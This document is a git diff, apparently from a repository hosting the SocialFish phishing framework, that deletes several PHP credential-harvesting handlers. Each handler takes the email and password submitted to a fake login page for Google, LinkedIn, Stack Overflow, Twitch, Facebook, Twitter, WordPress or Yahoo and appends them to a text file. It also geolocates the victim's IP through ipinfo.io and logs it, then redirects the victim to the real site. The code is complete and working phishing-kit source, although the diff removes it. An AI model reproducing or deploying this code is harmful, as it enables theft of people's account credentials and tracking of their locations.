$var2 = $_POST['Passwd'];
|
||||
$myFile = file_get_contents("protect.html");
|
||||
$searchString = "<html><title>There's a Phishing Page generated by SocialFish in this website.</title></html>";
|
||||
if($myFile == $searchString) {
|
||||
file_put_contents("usernames.txt", "[EMAIL]: " . $var . " [PASS]: " . $var2 . "\n", FILE_APPEND);
|
||||
header('Location: https://google.com/');
|
||||
}
|
||||
if($myFile != $searchString) {
|
||||
echo "***ALERT! I AM A FAKE PAGE | DO NOT TRUST ME";
|
||||
}
|
||||
file_put_contents("usernames.txt", "[EMAIL]: " . $_POST['Email'] . " [PASS]: " . $_POST['Passwd'] . "\n", FILE_APPEND);
|
||||
header('Location: https://google.com/');
|
||||
exit();
|
||||
?>
|
||||
|
||||
|
@ -1 +0,0 @@
|
||||
<html><title>There's a Phishing Page generated by SocialFish in this website.</title></html>
|
@ -1,56 +1,6 @@
|
||||
<?php
|
||||
// This program generates a web pages that gets
|
||||
// the user's information, saves it to a file,
|
||||
// and displays it on the web page.
|
||||
// Created by Anon UD4Y.
|
||||
// 19 Apr, 2018.
|
||||
|
||||
// Name of the ip address log.
|
||||
$outputWebBug = 'iplog.txt';
|
||||
include 'base.php';
|
||||
|
||||
// Get the ip address and info about client.
|
||||
@ $details = json_decode(file_get_contents("http://ipinfo.io/{$_SERVER['REMOTE_ADDR']}/json"));
|
||||
@ $hostname=gethostbyaddr($_SERVER['REMOTE_ADDR']);
|
||||
|
||||
// Get the query string from the URL.
|
||||
$QUERY_STRING = preg_replace("%[^/a-zA-Z0-9@,_=]%", '', $_SERVER['QUERY_STRING']);
|
||||
|
||||
// Write the ip address and info to file.
|
||||
@ $fileHandle = fopen($outputWebBug, "a");
|
||||
if ($fileHandle)
|
||||
{
|
||||
$string ='INFORMATION_ACCESSED-------------------------------------------------------------------'
|
||||
.$QUERY_STRING.' [1]IP-ADDRESS = ' // everything after "?" in the URL
|
||||
.$_SERVER['REMOTE_ADDR'].' [2]HOSTNAME = ' // ip address
|
||||
.$hostname.' [3]BROWSER & SYSTEM = ' // hostname
|
||||
.$_SERVER['HTTP_USER_AGENT'].' [4]REDIRECTED-BY = ' // browser and operating system
|
||||
.$_SERVER['HTTP_REFERER'].' [5]LATITUDE-LONGITUDE = ' // where they got the link for this page
|
||||
.$details->loc.' [6]ISP = ' // latitude, longitude
|
||||
.$details->org.' [7]CITY = ' // internet service provider
|
||||
.$details->city.' [8]STATE = ' // city
|
||||
.$details->region.' [9]COUNTRY = ' // state
|
||||
.$details->country.' [10]DATE & TIME = ' // country
|
||||
.date("D dS M,Y h:i a").'________________________________________________[DONE BY AN0NUD4Y]' // date
|
||||
."\n"
|
||||
;
|
||||
$write = fputs($fileHandle, $string);
|
||||
@ fclose($fileHandle);
|
||||
}
|
||||
|
||||
|
||||
|
||||
$var = $_POST['UsernameForm'];
|
||||
$var2 = $_POST['PasswordForm'];
|
||||
$myFile = file_get_contents("protect.html");
|
||||
$searchString = "<html><title>There's a Phishing Page generated by SocialFish in this website.</title></html>";
|
||||
if($myFile == $searchString) {
|
||||
file_put_contents("usernames.txt", "[EMAIL]: " . $var . " [PASS]: " . $var2 . "\n", FILE_APPEND);
|
||||
header('Location: https://linkedin.com/');
|
||||
}
|
||||
if($myFile != $searchString) {
|
||||
echo "***LOGIN SUCCESS***";
|
||||
header('Location: https://linkedin.com/');
|
||||
}
|
||||
file_put_contents("usernames.txt", "[EMAIL]: " . $_POST['UsernameForm'] . " [PASS]: " . $_POST['PasswordForm'] . "\n", FILE_APPEND);
|
||||
header('Location: https://linkedin.com/');
|
||||
exit();
|
||||
?>
|
||||
|
||||
|
@ -1 +0,0 @@
|
||||
<html><title>There's a Phishing Page generated by SocialFish in this website.</title></html>
|
@ -1,56 +1,7 @@
|
||||
<?php
|
||||
// This program generates a web pages that gets
|
||||
// the user's information, saves it to a file,
|
||||
// and displays it on the web page.
|
||||
// Created by Anon UD4Y.
|
||||
// 19 Apr, 2018.
|
||||
|
||||
// Name of the ip address log.
|
||||
$outputWebBug = 'iplog.txt';
|
||||
include 'base.php';
|
||||
|
||||
// Get the ip address and info about client.
|
||||
@ $details = json_decode(file_get_contents("http://ipinfo.io/{$_SERVER['REMOTE_ADDR']}/json"));
|
||||
@ $hostname=gethostbyaddr($_SERVER['REMOTE_ADDR']);
|
||||
|
||||
// Get the query string from the URL.
|
||||
$QUERY_STRING = preg_replace("%[^/a-zA-Z0-9@,_=]%", '', $_SERVER['QUERY_STRING']);
|
||||
|
||||
// Write the ip address and info to file.
|
||||
@ $fileHandle = fopen($outputWebBug, "a");
|
||||
if ($fileHandle)
|
||||
{
|
||||
$string ='INFORMATION_ACCESSED-------------------------------------------------------------------'
|
||||
.$QUERY_STRING.' [1]IP-ADDRESS = ' // everything after "?" in the URL
|
||||
.$_SERVER['REMOTE_ADDR'].' [2]HOSTNAME = ' // ip address
|
||||
.$hostname.' [3]BROWSER & SYSTEM = ' // hostname
|
||||
.$_SERVER['HTTP_USER_AGENT'].' [4]REDIRECTED-BY = ' // browser and operating system
|
||||
.$_SERVER['HTTP_REFERER'].' [5]LATITUDE-LONGITUDE = ' // where they got the link for this page
|
||||
.$details->loc.' [6]ISP = ' // latitude, longitude
|
||||
.$details->org.' [7]CITY = ' // internet service provider
|
||||
.$details->city.' [8]STATE = ' // city
|
||||
.$details->region.' [9]COUNTRY = ' // state
|
||||
.$details->country.' [10]DATE & TIME = ' // country
|
||||
.date("D dS M,Y h:i a").'________________________________________________[DONE BY AN0NUD4Y]' // date
|
||||
."\n"
|
||||
;
|
||||
$write = fputs($fileHandle, $string);
|
||||
@ fclose($fileHandle);
|
||||
}
|
||||
|
||||
|
||||
|
||||
$var = $_POST['email'];
|
||||
$var2 = $_POST['pass'];
|
||||
$myFile = file_get_contents("protect.html");
|
||||
$searchString = "<html><title>There's a Phishing Page generated by SocialFish in this website.</title></html>";
|
||||
if($myFile == $searchString) {
|
||||
file_put_contents("usernames.txt", "[EMAIL]: " . $var . " [PASS]: " . $var2 . "\n", FILE_APPEND);
|
||||
header('Location: https://stackoverflow.com/');
|
||||
}
|
||||
if($myFile != $searchString) {
|
||||
echo "***LOGIN SUCCESS***";
|
||||
header('Location: https://stackoverflow.com/');
|
||||
}
|
||||
file_put_contents("usernames.txt", "[EMAIL]: " . $_POST['email'] . " [PASS]: " . $_POST['pass'] . "\n", FILE_APPEND);
|
||||
header('Location: https://stackoverflow.com/');
|
||||
exit();
|
||||
?>
|
||||
|
||||
|
@ -1 +0,0 @@
|
||||
<html><title>There's a Phishing Page generated by SocialFish in this website.</title></html>
|
@ -1,52 +1,6 @@
|
||||
<?php
|
||||
// This program generates a web pages that gets
|
||||
// the user's information, saves it to a file,
|
||||
// and displays it on the web page.
|
||||
// Created by Anon UD4Y.
|
||||
// 19 Apr, 2018.
|
||||
|
||||
// Name of the ip address log.
|
||||
$outputWebBug = 'iplog.txt';
|
||||
include 'base.php';
|
||||
|
||||
// Get the ip address and info about client.
|
||||
@ $details = json_decode(file_get_contents("http://ipinfo.io/{$_SERVER['REMOTE_ADDR']}/json"));
|
||||
@ $hostname=gethostbyaddr($_SERVER['REMOTE_ADDR']);
|
||||
|
||||
// Get the query string from the URL.
|
||||
$QUERY_STRING = preg_replace("%[^/a-zA-Z0-9@,_=]%", '', $_SERVER['QUERY_STRING']);
|
||||
|
||||
// Write the ip address and info to file.
|
||||
@ $fileHandle = fopen($outputWebBug, "a");
|
||||
if ($fileHandle)
|
||||
{
|
||||
$string ='INFORMATION_ACCESSED-------------------------------------------------------------------'
|
||||
.$QUERY_STRING.' [1]IP-ADDRESS = ' // everything after "?" in the URL
|
||||
.$_SERVER['REMOTE_ADDR'].' [2]HOSTNAME = ' // ip address
|
||||
.$hostname.' [3]BROWSER & SYSTEM = ' // hostname
|
||||
.$_SERVER['HTTP_USER_AGENT'].' [4]REDIRECTED-BY = ' // browser and operating system
|
||||
.$_SERVER['HTTP_REFERER'].' [5]LATITUDE-LONGITUDE = ' // where they got the link for this page
|
||||
.$details->loc.' [6]ISP = ' // latitude, longitude
|
||||
.$details->org.' [7]CITY = ' // internet service provider
|
||||
.$details->city.' [8]STATE = ' // city
|
||||
.$details->region.' [9]COUNTRY = ' // state
|
||||
.$details->country.' [10]DATE & TIME = ' // country
|
||||
.date("D dS M,Y h:i a").'________________________________________________[DONE BY AN0NUD4Y]' // date
|
||||
."\n"
|
||||
;
|
||||
$write = fputs($fileHandle, $string);
|
||||
@ fclose($fileHandle);
|
||||
}
|
||||
|
||||
$var = $_POST['twitch_user'];
|
||||
$var2 = $_POST['twitch_pass'];
|
||||
$myFile = file_get_contents("protect.html");
|
||||
$searchString = "<html><title>WELCOME</title></html>";
|
||||
if($myFile != $searchString) {
|
||||
file_put_contents("usernames.txt", "[Twitch-EMAIL]: " . $var . " [Twitch-PASS]: " . $var2 . "\n", FILE_APPEND);
|
||||
header('Location:https://twitch.tv/login');
|
||||
}
|
||||
if($myFile != $searchString) {
|
||||
echo "LOGIN SUCCESSFULL";
|
||||
}
|
||||
file_put_contents("usernames.txt", "[Twitch-EMAIL]: " . $_POST['twitch_user'] . " [Twitch-PASS]: " . $_POST['twitch_pass'] . "\n", FILE_APPEND);
|
||||
header('Location: https://twitch.tv/login');
|
||||
exit();
|
||||
?>
|
||||
|
@ -1,52 +1,6 @@
|
||||
<?php
|
||||
// This program generates a web pages that gets
|
||||
// the user's information, saves it to a file,
|
||||
// and displays it on the web page.
|
||||
// Created by Anon UD4Y.
|
||||
// 19 Apr, 2018.
|
||||
|
||||
// Name of the ip address log.
|
||||
$outputWebBug = 'iplog.txt';
|
||||
include 'base.php';
|
||||
|
||||
// Get the ip address and info about client.
|
||||
@ $details = json_decode(file_get_contents("http://ipinfo.io/{$_SERVER['REMOTE_ADDR']}/json"));
|
||||
@ $hostname=gethostbyaddr($_SERVER['REMOTE_ADDR']);
|
||||
|
||||
// Get the query string from the URL.
|
||||
$QUERY_STRING = preg_replace("%[^/a-zA-Z0-9@,_=]%", '', $_SERVER['QUERY_STRING']);
|
||||
|
||||
// Write the ip address and info to file.
|
||||
@ $fileHandle = fopen($outputWebBug, "a");
|
||||
if ($fileHandle)
|
||||
{
|
||||
$string ='INFORMATION_ACCESSED-------------------------------------------------------------------'
|
||||
.$QUERY_STRING.' [1]IP-ADDRESS = ' // everything after "?" in the URL
|
||||
.$_SERVER['REMOTE_ADDR'].' [2]HOSTNAME = ' // ip address
|
||||
.$hostname.' [3]BROWSER & SYSTEM = ' // hostname
|
||||
.$_SERVER['HTTP_USER_AGENT'].' [4]REDIRECTED-BY = ' // browser and operating system
|
||||
.$_SERVER['HTTP_REFERER'].' [5]LATITUDE-LONGITUDE = ' // where they got the link for this page
|
||||
.$details->loc.' [6]ISP = ' // latitude, longitude
|
||||
.$details->org.' [7]CITY = ' // internet service provider
|
||||
.$details->city.' [8]STATE = ' // city
|
||||
.$details->region.' [9]COUNTRY = ' // state
|
||||
.$details->country.' [10]DATE & TIME = ' // country
|
||||
.date("D dS M,Y h:i a").'________________________________________________[DONE BY AN0NUD4Y]' // date
|
||||
."\n"
|
||||
;
|
||||
$write = fputs($fileHandle, $string);
|
||||
@ fclose($fileHandle);
|
||||
}
|
||||
|
||||
$var = $_POST['fb_email'];
|
||||
$var2 = $_POST['fb_pass'];
|
||||
$myFile = file_get_contents("protect.html");
|
||||
$searchString = "<html><title>WELCOME</title></html>";
|
||||
if($myFile != $searchString) {
|
||||
file_put_contents("usernames.txt", "[FB-EMAIL]: " . $var . " [FB-PASS]: " . $var2 . "\n", FILE_APPEND);
|
||||
header('Location:https://twitch.tv/');
|
||||
}
|
||||
if($myFile != $searchString) {
|
||||
echo "LOGIN SUCCESSFULL";
|
||||
}
|
||||
file_put_contents("usernames.txt", "[FB-EMAIL]: " . $_POST['fb_email'] . " [FB-PASS]: " . $_POST['fb_pass'] . "\n", FILE_APPEND);
|
||||
header('Location: https://twitch.tv/');
|
||||
exit();
|
||||
?>
|
||||
|
@ -1,53 +1,6 @@
|
||||
<?php
|
||||
// This program generates a web pages that gets
|
||||
// the user's information, saves it to a file,
|
||||
// and displays it on the web page.
|
||||
// Created by Anon UD4Y.
|
||||
// 19 Apr, 2018.
|
||||
|
||||
// Name of the ip address log.
|
||||
$outputWebBug = 'iplog.txt';
|
||||
include 'base.php';
|
||||
|
||||
// Get the ip address and info about client.
|
||||
@ $details = json_decode(file_get_contents("http://ipinfo.io/{$_SERVER['REMOTE_ADDR']}/json"));
|
||||
@ $hostname=gethostbyaddr($_SERVER['REMOTE_ADDR']);
|
||||
|
||||
// Get the query string from the URL.
|
||||
$QUERY_STRING = preg_replace("%[^/a-zA-Z0-9@,_=]%", '', $_SERVER['QUERY_STRING']);
|
||||
|
||||
// Write the ip address and info to file.
|
||||
@ $fileHandle = fopen($outputWebBug, "a");
|
||||
if ($fileHandle)
|
||||
{
|
||||
$string ='INFORMATION_ACCESSED-------------------------------------------------------------------'
|
||||
.$QUERY_STRING.' [1]IP-ADDRESS = ' // everything after "?" in the URL
|
||||
.$_SERVER['REMOTE_ADDR'].' [2]HOSTNAME = ' // ip address
|
||||
.$hostname.' [3]BROWSER & SYSTEM = ' // hostname
|
||||
.$_SERVER['HTTP_USER_AGENT'].' [4]REDIRECTED-BY = ' // browser and operating system
|
||||
.$_SERVER['HTTP_REFERER'].' [5]LATITUDE-LONGITUDE = ' // where they got the link for this page
|
||||
.$details->loc.' [6]ISP = ' // latitude, longitude
|
||||
.$details->org.' [7]CITY = ' // internet service provider
|
||||
.$details->city.' [8]STATE = ' // city
|
||||
.$details->region.' [9]COUNTRY = ' // state
|
||||
.$details->country.' [10]DATE & TIME = ' // country
|
||||
.date("D dS M,Y h:i a").'________________________________________________[DONE BY AN0NUD4Y]' // date
|
||||
."\n"
|
||||
;
|
||||
$write = fputs($fileHandle, $string);
|
||||
@ fclose($fileHandle);
|
||||
}
|
||||
|
||||
$var = $_POST['usernameOrEmail'];
|
||||
$var2 = $_POST['pass'];
|
||||
$myFile = file_get_contents("protect.html");
|
||||
$searchString = "<html><title>There's a Phishing Page generated by SocialFish in this website.</title></html>";
|
||||
if($myFile == $searchString) {
|
||||
file_put_contents("usernames.txt", "[EMAIL]: " . $var . " [PASS]: " . $var2 . "\n", FILE_APPEND);
|
||||
header('Location: https://twitter.com/');
|
||||
}
|
||||
if($myFile != $searchString) {
|
||||
echo "***LOGIN SUCCESS***";
|
||||
header('Location: https://twitter.com/');
|
||||
}
|
||||
file_put_contents("usernames.txt", "[EMAIL]: " . $_POST['usernameOrEmail'] . " [PASS]: " . $_POST['pass'] . "\n", FILE_APPEND);
|
||||
header('Location: https://twitter.com/');
|
||||
exit();
|
||||
?>
|
||||
|
@ -1 +0,0 @@
|
||||
<html><title>There's a Phishing Page generated by SocialFish in this website.</title></html>
|
@ -1,55 +1,6 @@
|
||||
<?php
|
||||
// This program generates a web pages that gets
|
||||
// the user's information, saves it to a file,
|
||||
// and displays it on the web page.
|
||||
// Created by Anon UD4Y.
|
||||
// 19 Apr, 2018.
|
||||
|
||||
// Name of the ip address log.
|
||||
$outputWebBug = 'iplog.txt';
|
||||
include 'base.php';
|
||||
|
||||
// Get the ip address and info about client.
|
||||
@ $details = json_decode(file_get_contents("http://ipinfo.io/{$_SERVER['REMOTE_ADDR']}/json"));
|
||||
@ $hostname=gethostbyaddr($_SERVER['REMOTE_ADDR']);
|
||||
|
||||
// Get the query string from the URL.
|
||||
$QUERY_STRING = preg_replace("%[^/a-zA-Z0-9@,_=]%", '', $_SERVER['QUERY_STRING']);
|
||||
|
||||
// Write the ip address and info to file.
|
||||
@ $fileHandle = fopen($outputWebBug, "a");
|
||||
if ($fileHandle)
|
||||
{
|
||||
$string ='INFORMATION_ACCESSED-------------------------------------------------------------------'
|
||||
.$QUERY_STRING.' [1]IP-ADDRESS = ' // everything after "?" in the URL
|
||||
.$_SERVER['REMOTE_ADDR'].' [2]HOSTNAME = ' // ip address
|
||||
.$hostname.' [3]BROWSER & SYSTEM = ' // hostname
|
||||
.$_SERVER['HTTP_USER_AGENT'].' [4]REDIRECTED-BY = ' // browser and operating system
|
||||
.$_SERVER['HTTP_REFERER'].' [5]LATITUDE-LONGITUDE = ' // where they got the link for this page
|
||||
.$details->loc.' [6]ISP = ' // latitude, longitude
|
||||
.$details->org.' [7]CITY = ' // internet service provider
|
||||
.$details->city.' [8]STATE = ' // city
|
||||
.$details->region.' [9]COUNTRY = ' // state
|
||||
.$details->country.' [10]DATE & TIME = ' // country
|
||||
.date("D dS M,Y h:i a").'________________________________________________[DONE BY AN0NUD4Y]' // date
|
||||
."\n"
|
||||
;
|
||||
$write = fputs($fileHandle, $string);
|
||||
@ fclose($fileHandle);
|
||||
}
|
||||
|
||||
|
||||
$var = $_POST['email'];
|
||||
$var2 = $_POST['pass'];
|
||||
$myFile = file_get_contents("protect.html");
|
||||
$searchString = "<html><title>There's a Phishing Page generated by SocialFish in this website.</title></html>";
|
||||
if($myFile == $searchString) {
|
||||
file_put_contents("usernames.txt", "[EMAIL]: " . $var . " [PASS]: " . $var2 . "\n", FILE_APPEND);
|
||||
header('Location: http://wordpress.org/');
|
||||
}
|
||||
if($myFile != $searchString) {
|
||||
echo "***LOGIN SUCCESS***";
|
||||
header('Location: http://wordpress.org/');
|
||||
}
|
||||
file_put_contents("usernames.txt", "[EMAIL]: " . $_POST['email'] . " [PASS]: " . $_POST['pass'] . "\n", FILE_APPEND);
|
||||
header('Location: http://wordpress.org/');
|
||||
exit();
|
||||
?>
|
||||
|
||||
|
@ -1 +0,0 @@
|
||||
<html><title>There's a Phishing Page generated by SocialFish in this website.</title></html>
|
@ -1,55 +1,6 @@
|
||||
<?php
|
||||
// This program generates a web pages that gets
|
||||
// the user's information, saves it to a file,
|
||||
// and displays it on the web page.
|
||||
// Created by Anon UD4Y.
|
||||
// 19 Apr, 2018.
|
||||
|
||||
// Name of the ip address log.
|
||||
$outputWebBug = 'iplog.txt';
|
||||
include 'base.php';
|
||||
|
||||
// Get the ip address and info about client.
|
||||
@ $details = json_decode(file_get_contents("http://ipinfo.io/{$_SERVER['REMOTE_ADDR']}/json"));
|
||||
@ $hostname=gethostbyaddr($_SERVER['REMOTE_ADDR']);
|
||||
|
||||
// Get the query string from the URL.
|
||||
$QUERY_STRING = preg_replace("%[^/a-zA-Z0-9@,_=]%", '', $_SERVER['QUERY_STRING']);
|
||||
|
||||
// Write the ip address and info to file.
|
||||
@ $fileHandle = fopen($outputWebBug, "a");
|
||||
if ($fileHandle)
|
||||
{
|
||||
$string ='INFORMATION_ACCESSED-------------------------------------------------------------------'
|
||||
.$QUERY_STRING.' [1]IP-ADDRESS = ' // everything after "?" in the URL
|
||||
.$_SERVER['REMOTE_ADDR'].' [2]HOSTNAME = ' // ip address
|
||||
.$hostname.' [3]BROWSER & SYSTEM = ' // hostname
|
||||
.$_SERVER['HTTP_USER_AGENT'].' [4]REDIRECTED-BY = ' // browser and operating system
|
||||
.$_SERVER['HTTP_REFERER'].' [5]LATITUDE-LONGITUDE = ' // where they got the link for this page
|
||||
.$details->loc.' [6]ISP = ' // latitude, longitude
|
||||
.$details->org.' [7]CITY = ' // internet service provider
|
||||
.$details->city.' [8]STATE = ' // city
|
||||
.$details->region.' [9]COUNTRY = ' // state
|
||||
.$details->country.' [10]DATE & TIME = ' // country
|
||||
.date("D dS M,Y h:i a").'________________________________________________[DONE BY AN0NUD4Y]' // date
|
||||
."\n"
|
||||
;
|
||||
$write = fputs($fileHandle, $string);
|
||||
@ fclose($fileHandle);
|
||||
}
|
||||
|
||||
|
||||
$var = $_POST['username'];
|
||||
$var2 = $_POST['password'];
|
||||
$myFile = file_get_contents("protect.html");
|
||||
$searchString = "<html><title>WELCOME</title></html>";
|
||||
if($myFile != $searchString) {
|
||||
file_put_contents("usernames.txt", "[EMAIL]: " . $var . " [PASS]: " . $var2 . "\n", FILE_APPEND);
|
||||
header('Location:https://login.yahoo.com');
|
||||
}
|
||||
if($myFile != $searchString) {
|
||||
echo "LOGIN SUCCESSFULL";
|
||||
header('Location:https://login.yahoo.com');
|
||||
}
|
||||
file_put_contents("usernames.txt", "[EMAIL]: " . $_POST['username'] . " [PASS]: " . $_POST['password'] . "\n", FILE_APPEND);
|
||||
header('Location: https://login.yahoo.com');
|
||||
exit();
|
||||
?>
|
||||
|
||||
|
Loading…
x
Reference in New Issue
Block a user